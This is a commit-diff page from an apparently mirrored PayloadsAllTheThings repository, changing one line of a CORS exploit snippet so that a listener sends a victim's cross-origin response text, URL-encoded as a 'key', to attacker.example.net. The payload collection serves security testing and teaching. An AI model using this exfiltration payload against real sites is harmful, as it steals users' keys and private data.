mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-01-05 09:17:09 -08:00
Some clarification in the exploit code
This commit is contained in:
@@ -112,7 +112,7 @@ origin in the request:
|
||||
req.send();
|
||||
|
||||
function reqListener() {
|
||||
location='$exploit-server-url/log?key='+encodeURIComponent(this.responseText);
|
||||
location='https://attacker.example.net/log?key='+encodeURIComponent(this.responseText);
|
||||
};
|
||||
</script>"></iframe>
|
||||
```
|
||||
|
||||
Reference in New Issue
Block a user